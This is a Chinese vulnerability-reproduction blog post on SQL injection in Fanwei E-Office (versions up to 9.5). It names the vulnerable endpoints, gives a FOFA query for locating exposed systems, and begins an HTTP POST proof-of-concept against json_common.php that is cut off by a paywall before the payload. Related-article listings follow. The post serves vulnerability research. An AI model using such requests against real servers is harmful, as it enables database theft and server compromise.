泛微E-Office SQL注入漏洞复现

已于 2023-11-28 20:21:49 修改
阅读量1.5k 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全 sql 数据库
于 2023-11-28 20:20:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134675267
版权

0x01 产品简介

    泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

0x02 漏洞概述

    泛微e-office  json_common.php、flow_xml.php、sms_page.php、getUserLists、detail.php、Init.php等接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 影响范围

e-office <=9.5

0x04 复现环境 

FOFA:app="泛微-EOffice"

0x05 漏洞复现

PoC-1

POST /building/json_common.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city%
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【1day】e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 430
e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
【1day】e-office OA系统xml.php 文件 SORT_ID 参数 SQL 注入漏洞学习
记录并分享学习安全的知识点..
12-08 828
e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。e-office OA系统xml.php 文件SORT_ID 参数存在SQL 注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
e-office系统存在SQL注入漏洞
holyxp的博客
11-02 832
e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
数据库字典
12-23
(e-cology7.0)数据库表结构设计文档,数据字典
(附nuclei yaml文件)E-office 10 atuh-filephar反序列化命令执行漏洞(QVD-2024-11354)
最新发布
nglj9527的博客
05-27 852
E-Offiсе10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。E-Offiсе10存在远程代码执行漏洞。由于系统处理上传的PHAR文件时存在缺陷,未经身份验证的远程攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
Goby 漏洞发布| E-office flow_xml.php 文件 SORT_ID 参数 SQL 注入漏洞
m0_46699477的博客
09-23 349
E-Office 是面向中小型组织推出的 OA 产品,由网络科技股份有限公司开发。 E-office 在 flow_xml.php 存在SQL注入漏洞,攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。
e-office SQL注入漏洞
11-03 486
e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
E-Office10远程代码执行漏洞
05-06
E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
e-office短信插件_短信接口开发_e-office短信发送设置
02-11
e-office短信插件设置指南 在e-office V10.0版本中,设置短信发送功能需要通过短信接口进行开发。下面将详细介绍e-office短信插件的设置步骤和短信接口的开发过程。 一、e-office短信插件...
最新E-office10.5 Eoffice V10.5 E-office10.0 Eoffice10.0 E-offic95 Eoffice9.0 8.0 行政事业V10.0-附件资源
03-02
最新E-office10.5 Eoffice V10.5 E-office10.0 Eoffice10.0 E-offic95 Eoffice9.0 8.0 行政事业V10.0-附件资源
e-office10to11升级包(适用10.0-20221012)
12-20
协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
OA协同办公平台E-office7.8 含注册机
01-11
OA协同办公平台 E-office7.8 含注册机==完美无限制 OA办公平台
OA_e-office标准版_使用手册
05-17
OA_e-office标准版_使用手册
e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁*************...
E-Office敏感信息泄露和未授权访问漏洞
08-03 1733
E-Office是一款标准化的协同 OA 办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
OA E-Office V10 OfficeServer 任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
10-20 2210
e-ofice是一款标准化的协同0A办公软件, E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等。
漏洞--E-Office 10任意文件上传漏洞
qq_53003652的博客
10-07 2473
E-Office 10在 10.0_20230821 版本之前存在远程代码执行漏洞,该漏洞是通过文件上传配合文件包含实远程代码执行,攻击者可利用此漏洞上传恶意文件并控制服务器。长亭应急团队经过分析后发漏洞是通过文件上传配合文件包含实远程代码执行。近期,长亭科技监测到官方发布了新补丁修了一处远程代码执行漏洞
E-Office10 远程代码执行漏洞(QVD-2024-11354)
0xSec
04-04 1810
2024年3月,互联网上披露E-Office10存在远程代码执行漏洞,攻击者可利用该漏洞获取服务器控制权限。该漏洞利用简单,无需前置条件,漏洞的关键在于系统处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
dofieldsql
07-23
### 回答1: dofieldsql 是一个在OA平台中使用的一种数据操作工具。它可以通过执行SQL语句来对数据库中的数据进行增删改查的操作。 dofieldsql 具有以下几个特点和功能: 1. 数据操作灵活:通过编写SQL语句,可以对数据库中的不同表和字段进行操作,实灵活的数据增删改查功能。 2. 数据安全性高:在进行数据操作之前,可以使用权限控制功能来限制用户的操作范围,确保敏感数据的安全性。 3. 数据操作效率高: dofieldsql 提供了一些优化功能,可以提升数据操作的效率。例如,可以对SQL语句进行优化,减少查询时间;还可以通过缓存等机制,提高数据读取的速度。 4. 数据操作可追溯: dofieldsql 可以记录每次数据操作的日志,包括操作时间、操作者等信息,方便管理员进行数据追踪和审核。 5. 数据操作支持批量处理: dofieldsql 支持批量操作数据,可以一次性对多条数据进行增删改查,提高操作效率。 总的来说, dofieldsqlOA平台中一种强大的数据操作工具,它可以帮助用户快速、灵活地进行各种数据操作,提高工作效率和数据安全性。 ### 回答2: dofieldsql是一个企业级办公自动化软件的功能模块之一。它是OA系统中的一个数据库访问接口,用于操作和管理数据库中的数据字段。 dofieldsql具有以下特点和功能: 1. 数据库操作:它可以实对数据库中的数据进行增、删、改、查等操作,方便用户对数据进行管理和维护。 2. 数据字段管理:它可以对数据库表的字段进行管理,包括添加、删除、修改字段信息等功能,灵活满足企业的不同需求。 3. 数据库查询:它支持灵活的数据库查询语法,用户可以根据需要自行编写查询语句,从数据库中检索出符合条件的数据。 4. 数据权限控制:它可以实对数据库中数据的访问权限控制,用户可以根据角色或者部门进行数据权限的配置,保证数据的安全性和隐私性。 5. 数据库连接池:它支持数据库连接池技术,提高数据库的访问效率和并发能力。 6. 数据库事务管理:它可以实对数据库操作的事务管理,保证多个数据库操作的原子性,确保数据的一致性。 dofieldsql作为OA系统的一部分,为企业提供了强大的数据库操作和管理功能,可以帮助企业提升工作效率,提高数据的管理和安全性。同时,它也提供了灵活的配置和扩展接口,满足不同企业的个性化需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值